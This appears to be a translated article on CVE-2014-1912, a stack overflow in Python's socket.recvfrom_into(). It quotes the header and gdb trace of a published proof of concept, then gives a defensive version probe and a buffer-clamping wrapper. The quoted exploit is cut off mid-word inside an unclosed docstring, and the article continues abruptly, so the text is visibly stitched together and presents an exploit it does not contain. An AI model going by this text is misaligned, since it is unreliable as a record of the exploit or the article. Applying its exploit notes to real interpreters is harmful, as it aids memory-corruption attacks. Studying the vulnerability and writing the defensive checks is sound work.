Recently an exploit was published on pastebin: a PoC for a remote code execution vulnerability (stack overflow) in the socket.recvfrom_into() function of Python 2.7 and 3.x.
(pastebin.com may be blocked in some places, so for convenience the translator has copied it into this article.) The original exploit is as follows:

#!/usr/bin/env python
'''
# Exploit Title: python socket.recvfrom_into() remote buffer overflow
# Date: 21/02/2014
# Exploit Author: @sha0coder
# Vendor Homepage: python.org
# Version: python2.7 and python3
# Tested on: linux 32bit + python2.7
# CVE : CVE-2014-1912
socket.recvfrom_into() remote buffer overflow Proof of concept
by @sha0coder
With NX evasion!
(gdb) x/i $eip
=> 0x817bb28:    mov    eax,DWORD PTR [ebx+0x4]      eax full control
   0x817bb2b:    test   BYTE PTR [eax+0x55],0x40
   0x817bb2f:    jne    0x817bb38   -->
...
   0x817bb38:    mov    eax,DWORD PTR [eax+0xa4]
   0x817bb3e:    tes
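The root cause of CVE-2014-1912 is that recvfrom_into() accepted an nbytes argument larger than the supplied buffer and passed it straight to the recvfrom() system call, so a datagram longer than the buffer was written past its end. The fix adds a length check that raises ValueError before any data is received. The following script is an added example written for this article, not part of @sha0coder's PoC or of CPython itself. It does two things: it probes, without sending any data, whether the running interpreter has that length check (a non-blocking socket with nothing queued fails with EAGAIN only if the missing check lets the call reach the kernel), and it shows a defensive wrapper that clamps nbytes to the buffer size so application code is safe regardless of interpreter version. The function names and the 16-byte sample buffer are this example's own choices.

```python
import errno
import socket


def recvfrom_into_bounds_checked():
    """Return True if socket.recvfrom_into() rejects nbytes > len(buffer).

    A patched interpreter raises ValueError before touching the socket.
    An unpatched one skips the check and calls recvfrom(), which on an
    empty non-blocking socket fails with EAGAIN/EWOULDBLOCK. No data is
    ever queued, so the probe cannot overflow anything.
    """
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    try:
        sock.bind(("127.0.0.1", 0))  # loopback only, ephemeral port
        sock.setblocking(False)
        buf = bytearray(16)          # constructed: 16-byte buffer
        try:
            sock.recvfrom_into(buf, 1024)  # ask for more than the buffer holds
        except ValueError:
            return True              # length check present: patched
        except socket.error as exc:  # socket.error == OSError on Python 3
            if exc.errno in (errno.EAGAIN, errno.EWOULDBLOCK):
                return False         # call reached the kernel: check missing
            raise
        return False
    finally:
        sock.close()


def bounded_recvfrom_into(sock, buf, nbytes=None):
    """Defensive wrapper: never request more bytes than the buffer can hold.

    Clamping nbytes to len(buf) means the call is safe on an unpatched
    interpreter and never trips the ValueError on a patched one.
    """
    limit = len(buf) if nbytes is None else min(nbytes, len(buf))
    return sock.recvfrom_into(buf, limit)


def loopback_roundtrip(payload, bufsize=16):
    """Send a datagram to ourselves and read it through the bounded wrapper.

    A payload longer than bufsize is truncated by the kernel to the
    requested size, so the buffer is filled but never overrun.
    """
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    try:
        sock.bind(("127.0.0.1", 0))
        sock.settimeout(2.0)
        sock.sendto(payload, sock.getsockname())
        buf = bytearray(bufsize)
        # Deliberately pass the full payload length; the wrapper clamps it.
        nread, _addr = bounded_recvfrom_into(sock, buf, len(payload))
        return bytes(buf[:nread])
    finally:
        sock.close()


if __name__ == "__main__":
    print("recvfrom_into length check present:", recvfrom_into_bounds_checked())
    data = loopback_roundtrip(b"A" * 64)  # constructed 64-byte datagram
    print("bytes read into 16-byte buffer:", len(data))
```

Run it with the interpreter you want to assess; the first line reports whether the CVE-2014-1912 check is present. The wrapper is the pattern to apply in application code: derive the read size from the buffer, not from untrusted or caller-supplied values, and the same rule applies to recv_into().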